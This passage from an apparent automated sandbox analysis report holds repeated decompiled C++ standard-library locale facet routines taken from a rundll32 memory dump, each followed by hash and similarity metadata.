                				if (_t53 != 0xffffffff) goto 0x205d21a9;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x206818f0 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrownumpunct
                • String ID:
                • API String ID: 1441279842-0
                • Opcode ID: a85674cbe9314ef8e78f8243866b22fcd257b156196965237d276de173b0bee3
                • Instruction ID: 4e41195d9e28ec866757d14f8e9c8e3ee4e8f7032f0b6fc798409cea479abf59
                • Opcode Fuzzy Hash: a85674cbe9314ef8e78f8243866b22fcd257b156196965237d276de173b0bee3
                • Instruction Fuzzy Hash: 5F313D33306E24C1EA219B25E9582E96361EBF4BE4F284292EE6D477EDDA34D447C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E00000215215205DA194(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t37;
                				void* _t44;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t54;
                				intOrPtr _t57;
                				signed long long _t58;
                				intOrPtr _t65;
                				intOrPtr* _t79;
                				long long _t80;
                				void* _t81;
                
                				_t52 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t81 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t80 =  *0x20681c28; // 0x0
                				_a24 = _t80;
                				_t57 =  *0x20681b68; // 0x0
                				if (_t57 != 0) goto 0x205da20f;
                				E00000215215205D19DC(0,  &_a8);
                				_t44 =  *0x20681b68 - _t57; // 0x0
                				if (_t44 != 0) goto 0x205da1fe;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b68 = _t52;
                				_t29 = E00000215215205D1A5C(_t52,  &_a8);
                				_t58 =  *0x20681b68; // 0x0
                				_t65 = _a8;
                				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205da223;
                				_t53 =  *((intOrPtr*)(_t65 + 0x10));
                				goto 0x205da225;
                				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205da2b2;
                				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205da24b;
                				E00000215215205D6CC0(_t29);
                				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205da249;
                				_t54 =  *((intOrPtr*)(_t53 + 0x10));
                				goto 0x205da24b;
                				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205da2b2;
                				if (_t80 == 0) goto 0x205da25a;
                				goto 0x205da2b2;
                				E00000215215205DCAA8(_t37, 0, 0, _t58,  &_a24, _t81);
                				if (_t54 != 0xffffffff) goto 0x205da289;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
                				asm("int3");
                				_t79 = _a24;
                				 *0x20681c28 = _t79;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrownumpunct
                • String ID:
                • API String ID: 1441279842-0
                • Opcode ID: 3c03136164760f7e1a6a07b6b4258b87c4cc0a42b8b06979b908849f69dc63f8
                • Instruction ID: 05c9a7488ccb59fed046eaa66e64e57450ee5fe3fc257c83733e4f57021ad2a0
                • Opcode Fuzzy Hash: 3c03136164760f7e1a6a07b6b4258b87c4cc0a42b8b06979b908849f69dc63f8
                • Instruction Fuzzy Hash: 6D314037306E24C1EB219B26E5582D96365EBF47E0F180252AE6D077EDDE34D443C704
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E00000215215205DA2CC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t37;
                				void* _t44;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t54;
                				intOrPtr _t57;
                				signed long long _t58;
                				intOrPtr _t65;
                				intOrPtr* _t79;
                				long long _t80;
                				void* _t81;
                
                				_t52 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t81 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t80 =  *0x20681bc8; // 0x0
                				_a24 = _t80;
                				_t57 =  *0x20681b18; // 0x0
                				if (_t57 != 0) goto 0x205da347;
                				E00000215215205D19DC(0,  &_a8);
                				_t44 =  *0x20681b18 - _t57; // 0x0
                				if (_t44 != 0) goto 0x205da336;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b18 = _t52;
                				_t29 = E00000215215205D1A5C(_t52,  &_a8);
                				_t58 =  *0x20681b18; // 0x0
                				_t65 = _a8;
                				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205da35b;
                				_t53 =  *((intOrPtr*)(_t65 + 0x10));
                				goto 0x205da35d;
                				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205da3ea;
                				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205da383;
                				E00000215215205D6CC0(_t29);
                				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205da381;
                				_t54 =  *((intOrPtr*)(_t53 + 0x10));
                				goto 0x205da383;
                				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205da3ea;
                				if (_t80 == 0) goto 0x205da392;
                				goto 0x205da3ea;
                				E00000215215205DCB7C(_t37, 0, 0, _t58,  &_a24, _t81);
                				if (_t54 != 0xffffffff) goto 0x205da3c1;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
                				asm("int3");
                				_t79 = _a24;
                				 *0x20681bc8 = _t79;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrownumpunct
                • String ID:
                • API String ID: 1441279842-0
                • Opcode ID: 8c6d8c65838e434312b1dd17bed9b4d444905f78ac3e8ceab61c4f28e1fcc8c0
                • Instruction ID: 8c49fba2907fa207f20ecf74cd9e05385cb6ebdaf651dc98bd2f7fdce4906954
                • Opcode Fuzzy Hash: 8c6d8c65838e434312b1dd17bed9b4d444905f78ac3e8ceab61c4f28e1fcc8c0
                • Instruction Fuzzy Hash: 85314D33706E60C1EB219B25E5582EA6365EBE47E0F280693EE6D077EDDA38D4438740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000215215205EE634(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t35;
                				void* _t42;
                				void* _t43;
                				void* _t45;
                				intOrPtr _t53;
                				intOrPtr _t54;
                				intOrPtr _t55;
                				intOrPtr _t58;
                				signed long long _t59;
                				intOrPtr _t66;
                				intOrPtr* _t80;
                				long long _t81;
                				void* _t82;
                				void* _t83;
                				void* _t84;
                
                				_t53 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t82 = __rcx;
                				_t3 =  &_a16; // 0x89
                				E00000215215205D19DC(0, _t3);
                				_t81 =  *0x20681cb8; // 0x0
                				_a24 = _t81;
                				_t58 =  *0x20681c78; // 0x0
                				if (_t58 != 0) goto 0x205ee6af;
                				_t5 =  &_a8; // 0x81
                				E00000215215205D19DC(0, _t5);
                				_t45 =  *0x20681c78 - _t58; // 0x0
                				if (_t45 != 0) goto 0x205ee69e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681c78 = _t53;
                				_t6 =  &_a8; // 0x81
                				_t29 = E00000215215205D1A5C(_t53, _t6);
                				_t59 =  *0x20681c78; // 0x0
                				_t66 = _a8;
                				if (_t59 -  *((intOrPtr*)(_t66 + 0x18)) >= 0) goto 0x205ee6c3;
                				_t54 =  *((intOrPtr*)(_t66 + 0x10));
                				goto 0x205ee6c5;
                				if ( *((intOrPtr*)(_t54 + _t59 * 8)) != 0) goto 0x205ee752;
                				if ( *((intOrPtr*)(_t66 + 0x24)) == dil) goto 0x205ee6eb;
                				E00000215215205D6CC0(_t29);
                				if (_t59 -  *((intOrPtr*)(_t54 + 0x18)) >= 0) goto 0x205ee6e9;
                				_t55 =  *((intOrPtr*)(_t54 + 0x10));
                				goto 0x205ee6eb;
                				if ( *((intOrPtr*)(_t55 + _t59 * 8)) != 0) goto 0x205ee752;
                				if (_t81 == 0) goto 0x205ee6fa;
                				goto 0x205ee752;
                				_t17 =  &_a24; // 0x91
                				E00000215215205EF154(0, _t42, _t43, _t59, _t17, _t82, _t83, _t84);
                				if (_t55 != 0xffffffff) goto 0x205ee729;
                				_t18 =  &_v48; // 0x49
                				E00000215215205B7290(_t18);
                				_t19 =  &_v48; // 0x49
                				E00000215215205F9940(_t59, _t19, 0x2066bb90, _t81);
                				asm("int3");
                				_t80 = _a24;
                				 *0x20681cb8 = _t80;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t80 + 8))))();
                				_t35 = E00000215215205D6C88(_t55, _t80);
                				_t22 =  &_a16; // 0x89
                				return E00000215215205D1A5C(_t35, _t22);
                			}
























                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowcollate
                • String ID:
                • API String ID: 1144514573-0
                • Opcode ID: dddffc8b7cee0c45d7b2c82b55984052fbcaf387caf02f0191d34294617ed4b0
                • Instruction ID: 54227492bcf1d1bd3394f9e4e437001dd0b331ae0860e2a9519ebbd76711b13c
                • Opcode Fuzzy Hash: dddffc8b7cee0c45d7b2c82b55984052fbcaf387caf02f0191d34294617ed4b0
                • Instruction Fuzzy Hash: DA314137316E60C1FB219B2AE5582D96365EFF47E0F280292AE9D477EDDE38D4468700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205EE76C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681cc0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681c80; // 0x0
                				if (_t56 != 0) goto 0x205ee7e7;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681c80 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205ee7d6;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681c80 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681c80; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205ee7fb;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205ee7fd;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205ee88a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205ee823;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205ee821;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205ee823;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205ee88a;
                				if (_t79 == 0) goto 0x205ee832;
                				goto 0x205ee88a;
                				E00000215215205EF274(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205ee861;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681cc0 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 75da1a24ee7ea4be0de446dfb2491d38a5f2297417b12a687ceb8dbe9b95a44d
                • Instruction ID: 9a03beaf9d698d3bb31dea69a2498452c66b33f84a20af301a5ccd86a1b28a21
                • Opcode Fuzzy Hash: 75da1a24ee7ea4be0de446dfb2491d38a5f2297417b12a687ceb8dbe9b95a44d
                • Instruction Fuzzy Hash: A9319E37356E60C1EB249B15E9582E96360EBF47E0F280292EE9D077EDDF38D4528700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205EE8A4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681cc8; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681c88; // 0x0
                				if (_t56 != 0) goto 0x205ee91f;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681c88 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205ee90e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681c88 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681c88; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205ee933;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205ee935;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205ee9c2;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205ee95b;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205ee959;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205ee95b;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205ee9c2;
                				if (_t79 == 0) goto 0x205ee96a;
                				goto 0x205ee9c2;
                				E00000215215205EF338(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205ee999;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681cc8 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 2876089e10c2d968e4b2043cd1299fec1bbcb9083603dd03a7c8325768136a48
                • Instruction ID: 1992142f654de9991cc5df5c84bafdc19ce02437321f1859908ef5a0f7665bce
                • Opcode Fuzzy Hash: 2876089e10c2d968e4b2043cd1299fec1bbcb9083603dd03a7c8325768136a48
                • Instruction Fuzzy Hash: 09314333356E20C1EB61DB16E5582D963A5EFE4BE0F280252DEAD477EEDE38D4468700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205EE9DC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681cd0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681c90; // 0x0
                				if (_t56 != 0) goto 0x205eea57;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681c90 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205eea46;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681c90 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681c90; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205eea6b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205eea6d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205eeafa;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205eea93;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205eea91;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205eea93;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205eeafa;
                				if (_t79 == 0) goto 0x205eeaa2;
                				goto 0x205eeafa;
                				E00000215215205EF3FC(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205eead1;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681cd0 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 877f2c0cd03a4cd06c5b2f01244cafccef2e8701e5ca348bb27c9845a8b59d70
                • Instruction ID: b4be7d3a233f56fd23d81b3d75b1a23509848cd2521408bc543f6a2d054d81a6
                • Opcode Fuzzy Hash: 877f2c0cd03a4cd06c5b2f01244cafccef2e8701e5ca348bb27c9845a8b59d70
                • Instruction Fuzzy Hash: 56318F33356E20C1EA209B15E5582E96365FBF4BE4F1802A6DEAD077EDDF38D4568700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000215215205EEB14(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681ce0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681ca0; // 0x0
                				if (_t56 != 0) goto 0x205eeb8f;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681ca0 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205eeb7e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681ca0 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681ca0; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205eeba3;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205eeba5;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205eec32;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205eebcb;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205eebc9;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205eebcb;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205eec32;
                				if (_t79 == 0) goto 0x205eebda;
                				goto 0x205eec32;
                				E00000215215205EF4C0(0, 0, _t57,  &_a24, _t80);
                				if (_t53 != 0xffffffff) goto 0x205eec09;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681ce0 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}



















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 7ed25d9783e5947a0e337c2ae12d66896172e224ed6d274b60e8faa8946382e9
                • Instruction ID: 5f9871e4bae441212b174d8573158b70285def908168235ae5f4c6a7a267c043
                • Opcode Fuzzy Hash: 7ed25d9783e5947a0e337c2ae12d66896172e224ed6d274b60e8faa8946382e9
                • Instruction Fuzzy Hash: 06317E33716E24C1EA219B25E4582E96364EFE47E0F680292DE9D077EDDF38D852C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D8BA4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t42;
                				void* _t43;
                				void* _t45;
                				intOrPtr _t53;
                				intOrPtr _t54;
                				intOrPtr _t55;
                				intOrPtr _t58;
                				signed long long _t59;
                				intOrPtr _t66;
                				intOrPtr* _t80;
                				long long _t81;
                				void* _t82;
                				void* _t83;
                
                				_t53 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t82 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t81 =  *0x20681c30; // 0x0
                				_a24 = _t81;
                				_t58 =  *0x20681b70; // 0x0
                				if (_t58 != 0) goto 0x205d8c1f;
                				E00000215215205D19DC(0,  &_a8);
                				_t45 =  *0x20681b70 - _t58; // 0x0
                				if (_t45 != 0) goto 0x205d8c0e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b70 = _t53;
                				_t29 = E00000215215205D1A5C(_t53,  &_a8);
                				_t59 =  *0x20681b70; // 0x0
                				_t66 = _a8;
                				if (_t59 -  *((intOrPtr*)(_t66 + 0x18)) >= 0) goto 0x205d8c33;
                				_t54 =  *((intOrPtr*)(_t66 + 0x10));
                				goto 0x205d8c35;
                				if ( *((intOrPtr*)(_t54 + _t59 * 8)) != 0) goto 0x205d8cc2;
                				if ( *((intOrPtr*)(_t66 + 0x24)) == dil) goto 0x205d8c5b;
                				E00000215215205D6CC0(_t29);
                				if (_t59 -  *((intOrPtr*)(_t54 + 0x18)) >= 0) goto 0x205d8c59;
                				_t55 =  *((intOrPtr*)(_t54 + 0x10));
                				goto 0x205d8c5b;
                				if ( *((intOrPtr*)(_t55 + _t59 * 8)) != 0) goto 0x205d8cc2;
                				if (_t81 == 0) goto 0x205d8c6a;
                				goto 0x205d8cc2;
                				E00000215215205DBB20(0, _t42, _t43, _t59,  &_a24, _t82, _t83);
                				if (_t55 != 0xffffffff) goto 0x205d8c99;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t59,  &_v48, 0x2066bb90, _t81);
                				asm("int3");
                				_t80 = _a24;
                				 *0x20681c30 = _t80;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t80 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t55, _t80),  &_a16);
                			}






















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowcollate
                • String ID:
                • API String ID: 1144514573-0
                • Opcode ID: 3d03665402543a626942d37dbf75a1454e9bb7ffc27db6286ccf80dc58e6ee34
                • Instruction ID: 33ced1da6e0efdf318c7dd462a93a924d058852f29f263090e7f2e74cbf3f199
                • Opcode Fuzzy Hash: 3d03665402543a626942d37dbf75a1454e9bb7ffc27db6286ccf80dc58e6ee34
                • Instruction Fuzzy Hash: 28313C37317E24C1EA219B25E5582E96365EBE4BE0F1802939E5D4BBFDDE38D8478700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000215215205EEC4C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681cd8; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681c98; // 0x0
                				if (_t56 != 0) goto 0x205eecc7;
                				E00000215215205D19DC(0,  &_a8);
